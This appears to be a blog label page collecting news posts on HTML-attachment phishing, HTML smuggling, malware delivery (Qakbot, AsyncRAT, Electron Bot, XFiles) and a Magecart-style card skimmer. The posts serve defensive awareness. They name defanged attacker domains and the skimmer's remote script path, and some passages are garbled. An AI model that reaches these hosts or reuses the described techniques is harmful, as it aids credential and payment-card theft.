Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label HTML. Show all posts

New Malware Campaign Exploits Windows Search to Spread

 



A new and intricate alware campaign has been discovered by Trustwave SpiderLabs, leveraging the Windows search feature embedded in HTML code to spread malicious software. The attack begins with a phishing email containing an HTML attachment disguised as a routine document, such as an invoice. To deceive users and evade email security scanners, the HTML file is compressed within a ZIP archive. This extra layer of obfuscation reduces the file size for quicker transmission, avoids detection by some email scanners, and adds a step for users, potentially bypassing simpler security measures. Notably, this campaign has been observed in limited instances.


HTML Attachment Mechanics

Once the HTML attachment is opened, it triggers a complex attack by abusing standard web protocols to exploit Windows system functionalities. A critical component of the HTML code is the `<meta http-equiv="refresh"` tag, which automatically reloads the page and redirects to a new URL with zero delay, making the redirection instant and unnoticed by the user. Additionally, an anchor tag serves as a fallback mechanism, ensuring the user is still at risk even if the automatic redirect fails.


Exploitation of the Search Protocol

When the HTML file loads, browsers typically prompt users to allow the search action as a security measure. The redirection URL uses the `search:` protocol, allowing applications to interact directly with Windows Explorer's search function. The attackers exploit this protocol to open Windows Explorer and perform a search with parameters they crafted. These parameters direct the search to look for items labelled as "INVOICE," control the search scope to a specific directory, rename the search display to "Downloads" to appear legitimate, and hide their malicious operations using Cloudflare’s tunnelling service.


Execution of Malicious Files

After the user permits the search action, Windows Explorer retrieves files named "invoice" from a remote server. Only one item, a shortcut (LNK) file, appears in the search results. This LNK file points to a batch script (BAT) hosted on the same server. If the user clicks the file, it could trigger additional malicious operations. At the time of analysis, the payload (BAT) could not be retrieved as the server was down, but the attack demonstrates a sophisticated understanding of exploiting system vulnerabilities and user behaviour.

To prevent exploitation of the `search-ms` and `search` URI protocols, one mitigation strategy is to disable these handlers by deleting the associated registry entries. This can be achieved using specific commands.

This attack surfaces the importance of user awareness and proactive security strategies. While it does not involve automated malware installation, it requires users to engage with various prompts and clicks, cleverly obscuring the attackers' true intent. As the threat landscape becomes more complex, continuous education and robust security measures are vital to protect against such deceptive tactics.

Trustwave SpiderLabs has updated its MailMarshal software to detect and block HTML files that abuse the search URI handler, offering additional protection for users.


Mobile Privacy Milestone: Gmail Introduces Client-Side Encryption for Android and iOS

 


Encryption is one of the most important mechanisms for protecting data exchanged between individuals, especially when the information exchange occurs over e-mail and is quite sensitive. As a result, it can be complicated for users to be able to achieve this when they use public resources such as the internet. 

Now that Gmail has added client-side encryption to its mobile platform, users may feel safer when sending emails with Gmail on their mobile devices. Earlier this year, Google announced that it would be supporting Android and iOS mobile devices with client-side encryption in Gmail too. 

Using Google's client-side encryption (CSE) feature, which gives users more control over encryption keys and data access, Gmail can now be used on Android and iOS devices, as well as web browsers. In the past few months, Gmail's web version has been upgraded to support client-side encryption. This app lets users read and write encrypted emails directly from their smartphones and tablets. 

In addition to the Education Plus and Enterprise Plus editions of Google Workspace, the Education Standard edition also offers the feature. Workspace editions that don't support client-side encryption, such as Essentials, Business Starter, Business Standard Plus, Business Pro Plus, etc., do not support client-side encryption. 

Furthermore, users who have personal Google accounts are not able to access it. For those using email via desktop through Gmail, client-side encryption will be available at the end of 2022 on a trial basis. Workspace users with a subscription to Enterprise Plus, Education Plus, or Education Standard were the only ones able to take advantage of this feature at that time. 

Client-side encryption also prevented certain features from working, including the multi-send mode, signatures, and Smart Compose, which all functioned properly when using client-side encryption. A more robust version of the feature has been added to the Google Play Store since then. 

The company added the capability to allow users to see contacts even if they are unable to exchange encrypted emails so that they can keep in touch. There is also a security alert that appears in Google Mail when users receive attachments that are suspicious or that cannot be opened because of security concerns. 

While client-side encryption will now be available under the Enterprise Plus, Education Plus, and Education Standard Workspace accounts shortly, it has remained relatively exclusive. This type of Workspace account will also be the only kind of account that will be able to take advantage of the mobile rollout of client-side encryption. 

By using the S/MIME protocol, Google said that it will allow its users to encrypt and digitally sign their emails before sending them to Google servers so that they adhere to compliance and regulatory requirements. This feature lets users access and work with your most sensitive data from anywhere with their mobile devices. 

The blue lock icon present in the subject field of Gmail for Android or iOS users allows them to enable client-side encryption while they are writing a Gmail email for Android or iOS devices. Administrators will, however, have to enable access to the feature through their CSE administration interface, as it is disabled by default. 

During the past week, the search giant celebrated its 25th anniversary by letting teens (age 13 and above) try out its generative search service. The company also announced a new tool called Google-Extended that would enable website administrators to control how Google's Bard AI can be trained on their content. It allows website administrators to control whether or not Google can access their content. 

In addition to pulling the plug on Gmail's basic HTML version, which used to support legacy browsers and users with slow connections and could be used to support legacy browsers, Google will also drop the automatic loading of Gmail's Basic view, instead loading the Standard view by default early next year. Customers who are using Google Workspace Enterprise Plus, Education Plus, and Education Standard will be able to take advantage of this feature. 

Emails With HTML Attachments are Still Popular Among Phishing Scammers

 


Cybercriminals are increasingly using malicious HTML files to attack computers, according to a recent study conducted by security researchers. In addition to this, Barracuda Networks' study also revealed that malicious files now account for over half of all HTML attachments sent via email. There has been a significant increase in applications compared to last year. 

Is there a phishing scam using HTML attachments you know of? To prevent cybercriminals from contacting C7C servers to download crypto-malware, Trojan horses, or other nasty nasties through email, HTML attachments are sent instead of email. 

Phishing scams based on HTML emails have been around for a long time, but people aren't aware of them, and they are increasingly falling for the same. 

There is a high chance that you checked your email more than once this past weekend. This is despite it being a holiday weekend for many people.

Even though HTML files continue to be one of the most common attachments used in phishing scams in 2022, it shows that the method is still one of the most effective methods of getting past spam detection software and delivering spam to targets who are looking for it. 

HTML (HyperText Markup Language) is a markup language developed to display documents created for display in a web browser, according to Wikibooks. The capabilities of technologies such as Cascading Style Sheets (CSS) and programming languages such as JavaScript can make it easier to do this.

It is possible to render HTML documents as multimedia web pages using a web server or a local storage device that receives HTML documents from a web server. An HTML document describes the semantics of a web page and includes clues that indicate how it should appear to the end user. HTML can also describe the content of a web page. 

When victims are sent phishing emails using HTML files, they are frequently directed to malicious websites, downloaded files, or phishing forms that can be displayed locally within their browsers on their computers.

It is common for email security software to overlook attachments when delivering messages to targets since HTML does not pose a threat to the recipients; as a result, messages are delivered successfully to their inboxes. 

Something is interesting about this recent increase in malicious HTML files. This does not seem to be the result of mass attack campaigns in which hackers send the same attachments to many victims. 

To protect against cyberattacks, it is now more imperative than ever to implement appropriate cybersecurity measures. The key to preventing such attacks is what the report uses as an example of how to prevent them. 

It has been reported that the cybercriminal groups DEV-0238 and DEV-0253 have also been using HTML smuggling to deliver keyloggers through HTML attachments they have sent using HTML smuggling. HTML smuggling has also been associated with the cybercriminal group DEV-0193 delivering Trickbot malware through HTML smuggling. 

HTML attachments are used in phishing attacks 


HTML attachments spammed by phishing sites are the most common type of HTML attachment. There is generally no malicious code within the HTML file itself. This means it does not have any malicious code that launches arbitrary code into the system even though it looks benign. Despite this, it is recommended to treat this attachment with caution. By mimicking the look of a sign-in page for a service such as Microsoft, Google, or a major online bank, the scam could lead to the user entering their credentials into the form and submitting it, resulting in a malicious website that takes over their account. 

When it comes to spam forms and redirection strategies in HTML attachments, hackers usually use several tactics for implementation. These tactics range from simple redirections to obfuscating JavaScript to disguise phishing forms to steal personal information. 

A secure email gateway and antivirus solution can check email messages for attachments to see if they contain malicious URLs, scripts, or other threats. This could threaten users' security. 

The majority of cybercrime attacks are composed of malicious phishing forms or redirects created using JavaScript in HTML attachments. This is done to avoid detection. 

Considering that malicious files can damage your device and your organization, it has become increasingly important to ensure you take the necessary precautions to keep yourself safe from them. It is imperative to know how to prevent such attempts by taking the following precautions: 

The infrastructure of your email system will be crucial in this case. Antivirus software and firewalls should be updated regularly to function properly. Furthermore, a solid plan of action must be implemented for data loss prevention. DMARC protocols should be defined for your domain as the most effective way to ensure communications security. 

Authenticating with two-factor authentication is necessary, followed by zero-trust access based on multi-factor authentication. You can be sure that your employees will be protected even if they fall victim to hacker attacks, credential theft, and phishing. This is because they will evaluate their credentials, device, location, time zone, and history of access and limit breaches. 

The importance of employee training on recognizing and reporting malicious HTML attachments shall be recognised. Employees must be trained on how to recognize and report attachments from unknown sources, especially those containing malware. Cybersecurity threats can have serious consequences for a business organization if it is not prevented.

Certainly, obfuscation is one of the common denominators among all the spammed HTML attachments in this case. Having to deal with a threat like this at the email gateway layer demonstrates just how difficult it is to detect.

Qakbot Distributes Malware Through OneNote

 


There have been reports of a new wave of Qakbot campaigns that use a novel method of distributing malware as part of the delivery process. The name of this sophisticated malware is Qakbot, though this malware has several different names, such as Pinkslipbot, and QuakBot. 

Research has found that Qakbot campaigns have been operating since 2007, and they are using OneNote documents to get the word out to the public. Infected systems tend to have malicious software that targets sensitive data from the systems, such as login credentials, financial data, and personal information. 

It has been observed that Qakbot has been used in recent years to distribute ransomware via other botnets, such as Emotet, which drops a secondary payload onto their botnets. 

In-Depth Discussion of the Subject

  • As part of these campaigns, malware is delivered using two attack vectors; one attacker embeds the URL into the email to download the malicious file, and the other uses the malicious file as an attachment in an email. 
  • Documents in OneNote feature a call-to-action button that runs the payload associated with the document when clicked.  
  • Qakbot uses various evasion methods, such as anti-debugging techniques, anti-dynamic analysis techniques, anti-AV techniques, and encrypted communication between clients and servers. 
What Are The Key Players?

  • Banks, financial institutions, wealth management companies, and even public sector organizations are the most impacted, followed by organizations in the government and outsourcing sectors which are also impacted.
  • Organizations in the United States, Thailand, India, and Turkey were targeted with the campaigns. 
A OneNote-Qakbot Campaign is Not New

According to researchers at Sophos, two parallel spam campaigns, nicknamed Qaknote, were disseminating malicious OneNote attachments by embedding a malicious HTML application within the attachment.

  • This campaign started with the dissemination of an impersonal malspam that contained a link to the malicious OneNote document embedded in the email.  · 
  • Inn the second case, a malicious OneNote notebook for unauthorized use was sent to all recipients in an email reply-to-all message that hijacked existing email threads by exploiting thread injection to hijack existing email threads.
  • After downloading and installing Qbot through these attachments, it is now ready to use.  
Here are the Main Points

Recent Qakbot campaigns have been focused on specifically targeted sectors, in contrast to earlier campaigns that appeared indiscriminate, and researchers predict that this targeted approach will likely persist in future campaigns as well. 

TTPs have been shared between researchers to help detect and mitigate the threats associated with this threat. Emails with attachments with unusual extensions are blocked, malicious websites are avoided, and top-level domains that are rarely used are blocked.   

Phishing Scam Blank Image Masks Code in SVG Files

 

Researchers from Avanan have seen the worldwide spread of a new threat known as 'Blank Image,' where hackers attach blank images to HTML messages. The user is instantly sent to a malicious URL once they open the attachment.

Blank Image attack 

Based on the bogus emails, you need to sign a DocuSign document. It is cryptically called "Scanned Remittance Advice.htm". An SVG picture encoded with Base64 is in the HTML file, these SVG vector pictures encoded in HTML attachments are used by scammers to get around the security features that are often turned on automatically in email inboxes. 

SVGs, are based on XML and are vector images, that can contain HTML script elements, in contrast to raster images like JPG and PNG. An SVG image is displayed and the JavaScript embedded in it is executed when an HTML document uses a <embed> or <iframe> tag to display the image.

Although the message's body seems fairly safe, opening the HTML attachment lets its malicious payload loose on your device. This file contains the attack's script rather than the XML information that a typical SVG would include.

As per researchers, this is a creative approach to mask the message's genuine intention. It avoids being scanned by conventional Click-Time Protection and VirusTotal, most security services are defenseless against these assaults because of the piling of obfuscation upon obfuscation.

Therefore, users should keep away from any emails that have HTML or.htm attachments. Administrators should consider preventing HTML attachments and treating them the same as executables (.exe, .cab).

This attack can be linked to a prior 'MetaMorph' assault initially discovered by Avanan a few years ago, wherein phishing actors employ meta refresh to drive users away from a locally hosted HTML attachment and onto a phishing website on the open internet. A meta refresh is a feature that tells a web browser to automatically reload the current web page after a specified amount of time.

HTML-containing emails and .HTM attachments should be handled carefully by users. Avanan also advises admins to think about blocking them.







Data Security can be Enhanced Via Web Scraping

Web information aids security professionals in understanding potential weaknesses in their own systems, threats that might come from outside organizations' networks, and prospective threats that might come via the World Wide Web. 

In reality, automated tests that can find the presence of potential malware, phishing links, various types of fraud, information breaches, and counterfeiting schemes are performed using this database of public Web data.

Web scraping: What is it?

Large volumes of data can be automatically gathered from websites via web scraping. The majority of this data is unstructured and is shown in HTML format, t is transformed into structured data in a spreadsheet or database so that it can be used in a variety of applications.

These include utilizing online services, certain APIs, or even writing one's own code from scratch for web scraping. The company doing the scraping is aware of the sites to visit and the information to be collected. There are APIs on a lot of big websites, including Google, Twitter, Facebook, StackOverflow, etc., which let users access their data in a structured manner. 

How Do Web Scrapers Operate?

Web scrapers have the power to extract all the data from specified websites or the precise data that a user requires. If you wanted to find out what kinds of peelers were available, for instance, you might want to scrape an Amazon page, but you might only need information on the models of the various peelers, not the feedback from customers.

Therefore, the URLs are first provided when a web scraper intends to scrape a website. Then, all of the websites' HTML code is loaded. A more sophisticated scraper might also extract all of the CSS and Javascript parts. The scraper then extracts the necessary data from this HTML code and outputs it in the manner that the user has chosen. The data is typically stored as an Excel spreadsheet or a CSV file, but it is also possible to save it in other formats, such as JSON files.

Cybersecurity Via Web Scraping

1. Monitoring for Potential Attacks on Institutions

Some of the top firms' security teams use open Web data collecting networks to acquire data on potential online threat actors and analyze malware. 

Additionally, they continuously and automatically check the public domain for potentially harmful websites or links using Web scraping techniques. For instance, security teams can instantly recognize several phishing websites that aim to steal important customer or business data like usernames, passwords, or credit card information.

2. Scraping the Web for Cybersecurity 

Web data collecting is used by a variety of cybersecurity companies to evaluate the risk that various domains pose for fraud and viruses. In order to properly assess the risk, cybersecurity firms can utilize this to contact potentially harmful websites as a 'victim' or a legitimate user to see how the website might target an unwary visitor. 

3. Analysis and Reduction of Threats

Public Web data collecting networks are used by threat intelligence companies to get information from a variety of sources, including blogs, public social media channels, and hackers, in order to find fresh information on a range of potential dangers. 

Their insights are based on this Web data collecting, which they subsequently disseminate to a wide range of customers that want to strengthen their own system security.

Despite being utilized often in business, lawful web scraping is still a touchy subject. Where personal information is scraped, this is the most evident. Users of LinkedIn, for instance, are aggressively marketing their personal information since the platform essentially functions as a professional CV showcase. Less desirable is having those details gathered in bulk, compiled, and sold to random people.

An organization's visibility and capacity to respond to online threats across the large online terrain in real-time are both improved by integrating with Web data collecting networks.








Threat Actors Prefer Archive Files for Deploying Malware Infections


Hackers prefer archive files, not MS Office

Archive files like .zip and .rar formats are now popular ways of distributing malware infections. HP Wolf Security report findings conclude that MS office documents weren't the most popular file format used in malware attacks. The company's third-quarter report reveals that archive files showed a 42% attack share, whereas Office recorded a 40% share. 

The report also noticed a sharp rise in popularity for archives, as the formats have seen their usage increase up to 22% since the first quarter of the year. As per the HP Wolf Security team, hackers prefer archive files because they are difficult to detect. 

"Archives are attractive to threat actors because they are easily encrypted, making them difficult for web proxies, sandboxes, and email scanners to detect malware. Moreover, many organizations use encrypted archives for legitimate reasons, making it challenging to reject encrypted archive email attachments by policy," the report said. 

Rise in HTML Smuggling Attacks

Besides the increase in archive files, HP Wolf Security logged a rise in "HTML smuggling" attacks, which, likewise, can escape security measures by using common file types. 

In this case, the user is sent a malicious PDF file containing loads of HTML. When opened, the PDF redirects the user to a fake downloader page for a common reader like Adobe Acrobat. After this, the page attempts to offer an archive file containing the actual malware payload. 

Threat actors prefer Qakbot malware strain

The researchers found that one group in particular, "Qakbot", favors the HTML smuggling technique to get its malware into the end user machines. The group, which went on a rampage during the summer, has restarted its activities. 

Qakbot is a highly effective malware strain that has been used by hackers to steal data and deploy ransomware. Most of these rising campaigns depend on HTML, aiming to compromise systems, moving away from malicious Office documents as the standard delivery method for the malware strain. 

At last, the team discovered that a traditional approach to ransomware is making a comeback. Magniber, aka  "single client ransomware" operation, profits not by attacking big organizations and asking multi-million dollar ransoms but instead it seeks individual PCs, locking up the data and asking users for a $2,500 payout.

The method goes back to the early times of ransomware when individual systems were attacked en masse with hopes of achieving a greater number of successful infections and ransom payments. 

Alex Holland, a senior malware analyst at HP said:

"Every threat actor has a different set of capabilities and resources that factor into what tactics, techniques, and procedures they use. Targeting individuals with single-client ransomware like Magniber requires less expertise, so this style of attack may appeal to threat actors with fewer resources and know-how who are willing to accept lower ransoms from victims"


Microsoft: Hackers Exploring New Attack Techniques

Malicious actors are adapting their strategies, techniques, and procedures in response to Microsoft's move to automatically block Excel 4.0 (XLM or XL4) and Visual Basic for Applications (VBA) macros across Office programs (TTPs).

Malicious Microsoft Office document attachments sent in phishing emails often contain VBA and XL4 Macros, two short programs designed to automate repetitive processes in Microsoft Office applications that threat actors use to load, drop, or install malware.

Sherrod DeGrippo, vice president of threat research and detection at Proofpoint, stated "the threat landscape has changed significantly as a result of threat actors shifting away from directly disseminating macro-based email attachments."

The change was made as a result of Microsoft's announcement that it will stop the widespread exploitation of the Office subsystem by making it more challenging to activate macros and automatically banning them by default.

New tactics 

Use of ISO, RAR, and Windows Shortcut (LNK) attachments to get around the block has multiplied by 66%, according to security firm Proofpoint, which calls this activity 'one of the largest email threat landscape shifts in recent history.' Actors spreading the Emotet malware are also involved in this activity.

The use of container files like ISOs, ZIPs, and RARs has also increased rapidly, increasing by about 175 percent. These are rapidly being used as initial access mechanisms by threat actors, between October 2021 and June 2022, the use of ISO files surged by over 150 percent.

Since October 2021, the number of campaigns including LNK files has climbed by 1,675%. Proofpoint has been tracking a variety of cybercriminal and advanced persistent threat (APT) actors who frequently use LNK files.

Emotet, IcedID, Qakbot, and Bumblebee are some of the famous malware families disseminated using these new techniques.

According to Proofpoint, the usage of HTML attachments employing the HTML smuggling approach to put a botnet on the host system has also increased significantly. Their distribution volumes, however, are still quite limited.

Finally, with a restricted range of potential threats to assess, email security systems are now more likely to detect hazardous files.

Google Drive & Dropbox Targeted by Russian Hackers

The Russian state-sponsored hacking collective known as APT29 has been attributed to a new phishing campaign that takes advantage of legitimate cloud services like Google Drive and Dropbox to deliver malicious payloads on compromised systems.

In recent efforts targeting Western diplomatic stations and foreign embassies globally between early May and June 2022, the threat group APT29 also known as Cozy Bear or Nobelium has embraced this new strategy. However, the phishing documents included a link to a malicious HTML file that was used as a dropper for other harmful files, including a Cobalt Strike payload, to enter the target network.

Google and DropBox were alerted about the operation by Palo Alto Networks, and they took measures to restrict it. Organizations and governments have been cautioned by Unit 42 researchers to maintain a high state of alert. Organizations should be cautious about their capacity to identify, inspect, and block undesirable traffic to legitimate cloud storage providers in light of APT 29's new methods.

APT29, also known as Cozy Bear, Cloaked Ursa, or The Dukes, is a cyber espionage organization that seeks to gather information that supports Russia's geopolitical goals. It also carried out the SolarWinds supply-chain hack, which resulted in the compromising of several US federal agencies in 2020.

The use of cloud services like Dropbox and Google Drive to mask their activity and download further cyberespionage into target locations is what has changed in the most recent versions. According to reports, the attack's second version, seen in late May 2022, was further modified to host the HTML dropper in Dropbox.

According to reports, the attack's second version, seen in late May 2022, was further modified to host the HTML dropper in Dropbox.

The findings also line up with a recent statement from the Council of the European Union that "condemns this appalling behavior in cyberspace" and highlights the rise in hostile cyber actions carried out by Russian threat actors.

In a news release, the EU Council stated that "this increase in harmful cyber actions, in the context of the war against Ukraine, presents intolerable risks of spillover effects, misinterpretation, and possible escalation."







XFiles Malware Exploits Follina, Expands ItsAttacks

What is XFiles?

The X-Files info stealer malware has put a new vulnerability in its systems to exploit CVE-2022-30190- Follina, and attack targeted systems with malicious payloads. A cybersecurity firm said that the new malware uses Follina to deploy the payload, run it, and take control of the targeted computer. "In the case of the XFiles malware, researchers at Cyberint noticed that recent campaigns delivering the malware use Follina to download the payload, execute it, and also create persistence on the target machine," says Bleeping Computers.  

How is Follina infected? 

•The malware, sent in the victims' spam mail, consists of an OLE object that directs to an HTML file on an external resource that has JavaScript code, which exploits Follina. 

•After the code is executed, it gets a base64-encoded string that contains PowerShell commands to make a presence in the Windows startup directory and deploy the malware. 

•The second-stage module, "ChimLacUpdate.exe," consists of an AES decryption key and a hard-coded encryption shellcode. An API call decodes it and deploys it in the same running process. 

•After infection, XFiles starts normal info stealer malware activities like targeting passwords and history stored in web browsers, cookies, taking screenshots, and cryptocurrency wallets, and look for Telegram and Discord credentials. 

•The files are locally stored in new directories before they are exfiltrated via Telegram. 

The XFiles is becoming more active 

• A cybersecurity agency said that XFiles has expanded by taking in new members and initiating new projects. 

• A project launched earlier this year by Xfiles is called the 'Punisher Miner.' 

• However, it's an irony that a new mining tool will charge $9, the same as how much XFiles costs for a month of renting the info stealer. 

CyWare Social says "it appears that the XFiles gang is expanding and becoming more prolific. The gang is recruiting talented malware authors, becoming stronger, and thus providing their users with more readymade tools that do not require experience or coding knowledge. Successful incorporation of the Follina-exploiting document increases the chances of infection and consequently increases the success rate of attacks."

Cybercriminals Impersonate Government Employees to Spread IRS Tax Frauds

 

At end of the 2021 IRS income tax return deadline in the United States, cybercriminals were leveraging advanced tactics in their phishing kits, which in turn granted them a high delivery success rate of spoofed e-mails with malicious attachments. 

On April 18th, 2022, a notable campaign was detected which invested phishing e-mails imitating the IRS, and in particular one of the industry vendors who provide services to government agencies which include e-mailing, Cybercriminals chose specific seasons when taxpayers are all busy with taxes and holiday preparations, which is why one should be extra cautious at these times.

The impersonated IT services vendor is widely employed by key federal agencies, including the Department of Homeland Security, as well as various state and local government websites in the United States. The detected phishing e-mail alerted victims about outstanding IRS payments, which should be paid via PayPal, and included an HTML attachment which looked like an electronic invoice. Notably, the e-mail has no URLs and was delivered to the victim's mailbox without being tagged as spam. The e-mail was delivered through many "hops" based on the inspected headers, predominantly using network hosts and domains registered in the United States.

It is worth mentioning that none of the affected hosts had previously been 'blacklisted,' nor had any evidence of bad IP or anomalous domain reputation at the time of identification. The bogus IRS invoice's HTML attachment contains JS-based obfuscation code. Further investigation revealed embedded scenarios which detected the victim's IP (using the GEO2IP module, which was placed on a third-party WEB-site), most likely to choose targets or filter by region. 

After the user views the HTML link, the phishing script shall prompt the user to enter personal credentials, impersonating the Office 365 authentication process with an interactive form.

The phishing-kit checks access to the victim's e-mail account through IMAP protocol once the user enters personal credentials. The actors were utilizing the "supportmicrohere[.]com" domain relying on the de-obfuscated JS content. 

Threat actors most likely tried to imitate Microsoft Technical Support and deceive users by utilizing a domain with similar spelling. The script intercepts the user's credentials and sends them to the server using a POST request. Login and password are sent to the jbdelmarket[.]com script through HTTP POST. A series of scripts to examine the IP address of the victim is hosted on the domain jbdelmarket[.]com. The phishing e-header emails include multiple domain names with SPF and DKIM records. 

A Return-Path field in the phishing e-mail was set as another e-mail controlled by the attackers which gather data about e-mails that were not sent properly. The Return-Path specifies how and where rejected emails will be processed, and it is used to process bounces from emails.

Spyware Infests the Microsoft Store with Classic Game Pirates

 



Electron Bot, a malware which infiltrated Microsoft's Official Store via clones of popular games like Subway Surfer and Temple Run, infected approximately 5,000 machines in Sweden, Israel, Spain, and Bermuda. 

Check Point discovered and studied the malware, which is a backdoor to give attackers unlimited control over infected PCs, allowing for remote command processing and real-time interactions. The threat actors' purpose is social media promotion and fraud, which is done by gaining control of social media profiles where Electron Bot allows for new account registration, commenting, and liking. 

An initial Electron Bot variant was uploaded to the Microsoft Store as "Album by Google Photos," published by a faked Google LLC business, and the operation was identified at the end of 2018. The malware, which is named after the Electron programming language, can mimic natural browsing behavior and perform acts as if it were a real website visitor. It accomplishes this by opening a new hidden browser window with the Electron framework's Chromium engine, setting the relevant HTTP headers, rendering the requested HTML page, and lastly performing mouse actions.

Threat actors develop rogue websites and employ search engine optimization strategies to push them to the top of the search results in an SEO poisoning campaign. SEO poisoning is also offered as a service to increase other websites' ranks, in addition to boosting bad sites' SEO rankings. The infection chain starts when the user downloads one of the infected apps from the Microsoft Store, which is otherwise a reliable source of software. When the application is launched, a JavaScript dropper is dynamically loaded in the side to fetch and install the Electron Bot payload. 

The malware links to the C2 (Electron Bot[.]s3[.]eu-central-1[.]amazonaws. com or 11k[.]online), acquires its configuration, and implements any commands in the pipeline at the next system startup. The JS files dumped on the machine's RAM are relatively short and appear to be benign because the major scripts are loaded flexibly at run time. 

Fraud, fleece wear, and financial trojans abound in official app shops. The Xenomorph banking malware was recently found by ThreatFabric, and the most humorous has to be Vultur, a trojan hidden inside a fully functional two-factor authentication (2FA) app which recently infected 10,000 people who downloaded it from Google Play. 

The successful entry of Electron Bot into Microsoft's official app store is only the most recent example of how consumers throw precaution into the breeze whenever a user views a bright new toy on the apps.

Credit Cards Were Forged from a Prominent e-Cigarette Store

 

Since being breached, Element Vape, a famous online retailer of e-cigarettes including vaping kits, is harboring a credit card skimmer on its website. In both retail and online storefronts in the United States and Canada, this retailer provides e-cigarettes, vaping equipment, e-liquids, and Synthetic drugs.
 
Its website Element Vape is uploading a potentially Malicious file from either a third-party website that appears to be a credit card stealer. Magecart refers to threat actors who use credit card cybercriminals on eCommerce sites by infiltrating scripts. 

On numerous shop webpages, beginning with the homepage, a mystery base64-encoded script may be seen on pages 45-50 of the HTML source code. For an unknown period of time, the computer worm has so far been present on ElementVape.com. 

This code was gone as of February 5th, 2022, and before, according to a Wayback Machine review of ElementVape.com. As a result, the infection appears to have occurred more recently, probably after the date and before today's detection. When decoded, it simply fetches the appropriate JavaScript file from a third-party site :

/weicowire[.]com/js/jquery/frontend.js

When this script was decoded and examined, it was apparent – the collection of credit card and invoicing information from clients during the checkout. The script looks for email addresses, payment card details, phone numbers, and billing addresses (including street and ZIP codes). 

The attacker acquires these credentials via a predefined Telegram address in the script which is disguised. The code also has anti-reverse-engineering features which check if it's being run in a sandbox or with "devtools" to prevent it from being examined.

It's unclear how the backend code of ElementVape.com was altered in the first place to allow the malicious script to enter. Reportedly, this isn't the first instance Element Vape's security has been breached. Users reported getting letters from Element Vape in 2018 indicating the company had a data breach so the "window of penetration between December 6, 2017, and June 27, 2018, might have revealed users" personal details to threat actors. 

Threat Advert is a New Service Strategy Invented by AsyncRAT

 

AsyncRAT is a Remote Access Tool (RAT) that uses a secure encrypted connection to monitor and control other machines remotely. It is an open platform distributed processing tool but it has the potential to be used intentionally because it includes features like keylogging, remote desktop command, and other functionalities that could destroy the victim's PC. Furthermore, AsyncRAT can be distributed using a variety of methods, including spear-phishing, malvertising, exploit kits, and other means. 

Morphisec has detected a new, advanced campaign distribution that has been successfully eluding the radar of several security providers, thanks to the breach prevention using Moving Target Defense technology.

Potential hackers are spreading AsyncRAT to targeted machines with a simple email phishing method with an Html attachment. AsyncRAT is meant to remotely monitor and manipulate attacked systems through a protected, encrypted connection. This campaign ran for 4 to 5 months, with the lowest detection rates according to VirusTotal. 

Victims received the email notification with an HTML attachment in the manner of a receipt: Receipt-digits>.html in many cases. When the victim opens the receipt, users are sent to a webpage where a user must store a downloaded ISO file. The user believes it is a routine file download that will pass via all port and network security scanning channels. Surprisingly, this is not true. 

The ISO download, in fact, is created within the user's browser by the JavaScript code hidden within the HTML receipt file, rather than being downloaded from a remote server. 

To reduce the possibility of infection by AsyncRAT, users must follow the following steps:
  • Updating antivirus fingerprints and engines is a must. 
  • Enable automatic updates to ensure that the operating system is up to date with the most recent security fixes. 
  • Email addresses should not be made public on the internet. 
  • Don't click email attachments with strange-looking extensions. When opening any email attachment, especially the one from unknown senders, proceed with caution.
  • Exercise caution while opening emails with generic subject lines. 

Phishing Attackers Spotted Using Morse Code to Avoid Detection

 

Microsoft has revealed details of a deceptive year-long social engineering campaign in which the operators changed their obfuscation and encryption mechanisms every 37 days on average, including using Morse code, in an attempt to hide their tracks and steal user credentials. 

One of numerous tactics employed by the hackers, who Microsoft did not name, to disguise harmful software was Morse Code, a means of encoding characters with dots and dashes popularised by telegraph technology. It serves as a reminder that, despite their complexity, modern offensive and defensive cyber measures are generally based on the simple principle of hiding and cracking code. 

The phishing attempts take the shape of invoice-themed lures that imitate financial-related business transactions, with an HTML file ("XLS.HTML") attached to the emails. The ultimate goal is to collect usernames and passwords, which are then utilized as an initial point of access for subsequent infiltration attempts. 

The attachment was compared to a "jigsaw puzzle" by Microsoft, who explained that individual pieces of the HTML file are designed to appear innocuous and slip by the endpoint security software, only to expose their true colors when decoded and joined together. The hackers that carried out the attack were not identified by the company.

"This phishing campaign exemplifies the modern email threat: sophisticated, evasive, and relentlessly evolving," Microsoft 365 Defender Threat Intelligence Team said in an analysis. “On their own, the individual segments of the HMTL file may appear harmless at the code level and may thus slip past conventional security solutions." 

When you open the attachment, a counterfeit Microsoft Office 365 credentials dialogue box appears on top of a blurred Excel document in a browser window. The dialogue box displays a message requesting recipients to re-sign in since their access to the Excel document has allegedly expired. When a user types in a password, the user is notified that the password is incorrect, while the virus stealthily collects the information in the background. Since its discovery in July 2020, the campaign is reported to have gone through ten iterations, with the adversary occasionally changing up its encoding methods to hide the harmful nature of the HTML attachment and the many assault segments contained within the file. 

According to Christian Seifert, lead research manager at Microsoft's M365 Security unit, the hackers have yet to be linked to a known group. “We believe it is one of the many cybercrime groups that defraud victims for profit,” Seifert said.

Google and Mozilla Develop an API for HTML Sanitization

 

Google, Mozilla, and Cure53 engineers have collaborated to create an application programming interface (API) that offers a comprehensive solution to HTML sanitization. The API will be used in upcoming versions of the Mozilla Firefox and Google Chrome web browsers. 

HTML sanitization is the process of reviewing an HTML document and creating a new HTML document that only contains the "secure" and desired tags. By sanitizing any HTML code submitted by a user, HTML sanitization can be used to defend against attacks like cross-site scripting (XSS).

Sanitation is usually carried out using either a whitelist or a blacklist strategy. Sanitization can be done further using rules that define which operations should be performed on the subject tags. 

When rendering user-generated content or working with templates, web applications are often expected to manage dynamic HTML content in the browser. Client-side HTML processing often introduces security flaws, which malicious actors exploit to stage XSS attacks, steal user data, or execute web commands on their behalf. 

“Historically, the web has been confronted with XSS issues ever since the inception of JavaScript,” Frederik Braun, security engineer at Mozilla, said. “The web has an increase in browser capabilities with new APIs and can thus be added to the attacker’s toolbox.” 

To protect against XSS attacks, many developers use open-source JavaScript libraries like DOMPurify. DOMPurify takes an HTML string as input and sanitizes it by deleting potentially vulnerable parts and escaping them. 

“The issue with parsing HTML is that it is a living standard and thus a quickly moving target,” Braun said. “To ensure that the HTML sanitizer works correctly on new input, it needs to keep up with this standard. The failure to do so can be catastrophic and lead to sanitizer bypasses.” 

The HTML Sanitizer API incorporates XSS security directly into the browser. The API's sanitizer class can be instantiated and used without the need to import external libraries. 

